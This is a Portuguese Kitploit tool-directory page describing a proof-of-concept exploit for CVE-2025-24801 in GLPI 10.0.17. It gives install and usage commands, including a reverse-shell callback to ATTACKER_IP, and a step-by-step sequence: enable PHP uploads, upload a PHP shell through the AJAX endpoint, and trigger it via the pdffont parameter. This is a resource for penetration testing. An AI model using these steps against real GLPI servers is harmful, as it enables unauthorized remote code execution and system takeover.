Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-24801 — Exploração de prova de conceito para CVE-2025-24801, uma vulnerabilidade LFI-para-RCE no GLPI 10.0.17. Automatiza login, habilita uploads PHP e envia um shell reverso para testes de segurança autorizados. | Kitploit
Ferramentas/GitHubGitHub/fatkz/cve-2025-24801
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubfatkz/cve-2025-24801

CVE-2025-24801

Exploração de prova de conceito para CVE-2025-24801, uma vulnerabilidade LFI-para-RCE no GLPI 10.0.17. Automatiza login, habilita uploads PHP e envia um shell reverso para testes de segurança autorizados.

Ver Repositório
3111há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-24801 PoC para RCE no GLPI

Este repositório contém um script de prova de conceito (poc.py) que explora CVE-2025-24801, uma vulnerabilidade LFI-para-RCE no GLPI 10.0.17. Ele automatiza:

  • Login no GLPI
  • Habilitar uploads de .php atualizando as configurações de tipo de documento
  • Enviar um shell reverso PHP via endpoint de upload de arquivo AJAX

🛠️ Instalação

root@kitploit:~
git clone https://github.com/fatkz/CVE-2025-24801.git
cd CVE-2025-24801
pip install -r requirements.txt

🚀 Uso

root@kitploit:~
python3 poc.py \
  --url https://target.example.com/glpi \
  --user TECHNICIAN_USER \
  --password "PASSWORD" \
  --lhost ATTACKER_IP \
  --lport 4444
  • --url: URL base da instância GLPI (ex.: )
https://example.com/glpi
  • --user / --password: Credenciais válidas de técnico GLPI
  • --lhost / --lport: IP e porta do atacante para o listener do shell reverso
  • O script usa automaticamente --doc-id 1 como padrão para atualizar o primeiro tipo de documento.

    Após a execução, o script irá:

    1. Fazer login e estabelecer uma sessão
    2. Habilitar uploads de .php atualizando o tipo de documento ID 1
    3. Enviar exploit.php contendo um payload de shell reverso PHP

    Você precisará então acionar manualmente o LFI especificando o nome do arquivo enviado no include da fonte PDF (ex.: via funcionalidade de exportação de relatório) para alcançar RCE.

    📑 Como Funciona

    1. Login: Extrai o token CSRF de /front/login.php e envia as credenciais para autenticar.
    2. Habilitar Uploads PHP: Acessa /front/documenttype.form.php?id=1, analisa o token CSRF e adiciona php às extensões permitidas.
    3. Enviar Shell: Acessa /front/ticket.form.php para um token CSRF, depois usa /ajax/fileupload.php (com X-Requested-With: XMLHttpRequest) para enviar um shell reverso PHP.
    4. Acionar RCE: Invoque manualmente o LFI da fonte PDF especificando o nome do shell enviado no parâmetro pdffont durante a exportação do relatório.

    ⚠️ Aviso

    Esta ferramenta destina-se exclusivamente a testes de segurança autorizados e fins educacionais. Não a utilize contra sistemas sem permissão explícita.


    Criado para fins educacionais e de teste de penetração autorizados.

    Baixar ferramenta